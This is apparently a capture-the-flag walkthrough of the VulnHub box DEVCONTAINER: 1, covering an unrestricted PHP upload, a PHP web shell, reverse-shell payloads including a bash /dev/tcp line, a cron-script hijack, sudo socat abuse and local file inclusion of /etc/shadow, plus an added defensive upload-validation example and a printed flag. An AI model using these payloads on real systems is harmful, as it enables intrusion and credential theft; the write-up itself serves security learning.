Goal: 2 flags
Difficulty: Easy-intermediate

Well, not much to go on here. The box is DEVCONTAINER: 1 from vulnhub.


We’ve got one port only; HTTP on 80.


So with a quick gobuster fishing expedition we find an upload directory:

And it contains the text: Allowed file types: jpg,gif,png,zip,txt,xls,doc
However, in the page source there is a comment saying "I need to validate file extensions" - so maybe the whitelisting hasn't been implemented yet? Let's see.

I create a file test.php with the content:

<?php system($_GET['cmd']);?>

And try to upload it - it is accepted. So that's great. Now we go fire off a reverse shell through the cmd parameter (sent URL-encoded):

$sock%3dfsockopen(%22192.168.1.77%22,1234)%3bexec(%22/bin/sh+-i+%3C%263+%3E%263+2%3E%263%22)%3b%27

And we’re on the box as www-data.
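For contrast, this is the kind of server-side check that comment was asking for. It is an example I've added here, not the box's own upload code: it enforces the advertised whitelist on the final extension, sniffs the file content, and stores the file under a server-chosen name. The $_FILES entry, $uploadDir and the extension-to-MIME map are my assumptions.

```php
<?php
// Added example, not the box's own upload handler: enforce the whitelist the
// page advertises ("jpg,gif,png,zip,txt,xls,doc") on the server side.
// Assumed: $file is one entry of $_FILES; $uploadDir lies outside the web root.
const ALLOWED_EXT = ['jpg', 'gif', 'png', 'zip', 'txt', 'xls', 'doc'];

// Content types we accept per extension (assumed list; libmagic versions vary
// on the OLE-based Office formats, hence the second entry for xls/doc).
const EXPECTED_MIME = [
    'jpg' => ['image/jpeg'],
    'gif' => ['image/gif'],
    'png' => ['image/png'],
    'zip' => ['application/zip'],
    'txt' => ['text/plain'],
    'xls' => ['application/vnd.ms-excel', 'application/x-ole-storage'],
    'doc' => ['application/msword', 'application/x-ole-storage'],
];

// Return the whitelisted extension of the client-supplied name, or null.
// Only the final extension counts ("x.php.jpg" is checked as "jpg").
function allowedExtension(string $originalName): ?string {
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $ext : null;
}

// Sniff the actual content and check it matches the claimed extension.
function contentMatchesExtension(string $tmpPath, string $ext): bool {
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    return $mime !== false && in_array($mime, EXPECTED_MIME[$ext], true);
}

// Validate one upload and move it into $uploadDir under a random name.
// Returns the stored filename; throws on any rejection.
function storeUpload(array $file, string $uploadDir): string {
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed or was not an HTTP upload');
    }
    $ext = allowedExtension($file['name']);
    if ($ext === null) {
        throw new RuntimeException('File type not allowed');
    }
    if (!contentMatchesExtension($file['tmp_name'], $ext)) {
        throw new RuntimeException('File content does not match its extension');
    }
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;   // client name discarded
    if (!move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $stored)) {
        throw new RuntimeException('Could not store file');
    }
    return $stored;
}
```

With this in place, test.php is rejected at the extension check, and the same content renamed to .jpg is rejected at the content check.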

In a container

We’re in a Docker container and there is no python or python3, which I would normally use to upgrade my shell. Instead I do:

/usr/bin/script -qc /bin/bash /dev/null
stty raw -echo; fg; reset

And that does the job. The suggestion came from here.

In the web directory, there are a couple of interesting things, including this script:

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ cat
#Version 1.0
#This script monitors the uploaded files. It is a reverse shell monitoring measure.
#path= /home/richard/web/webapp/upload/files/

So this executes the script. What’s in that?

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ cat
date >> /home/richard/web/Maintenance-Web-Docker/out.txt
ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt

We have write access to, so what if we add a line to it?

www-data@1a135ef22c7a:/var/www/html/Maintenance-Web-Docker$ echo "bash -i >& /dev/tcp/ 0>&1" >>

With a new listener, we get a new shell as Richard.


From Richard we can get our first flag, user.txt: 3a6b99f59ea363803bcafc7f5dd9b1e8

Richard appears to have an interesting capability:

richard@EC2:~$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
    env_reset, mail_badpass,

User richard may run the following commands on EC2:
    (ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork

We can run the command; nothing very interesting seems to happen. I’m not familiar with socat, but doing some research shows this is a port forwarding command. We can visit in Firefox - and there is a webpage. This port wasn’t open previously.


The webpage has two links:

Interestingly, these aren’t separate pages, but view parameters in index.php (and they don’t work). Does anything else work? Yes:

So we’ve got Local File Inclusion and can read both the shadow file and the last flag. I copied the root hash and threw John at it but it didn’t seem keen to break.

So we’ve gotten the flag - but can we also get a shell? Sure, why not.

Since I didn’t previously upload a shell (just a command grabber), I need to upload one now - I used the usual pentestmonkey shell. Then I can go to:

And catch a reverse shell as root. Now we really are done.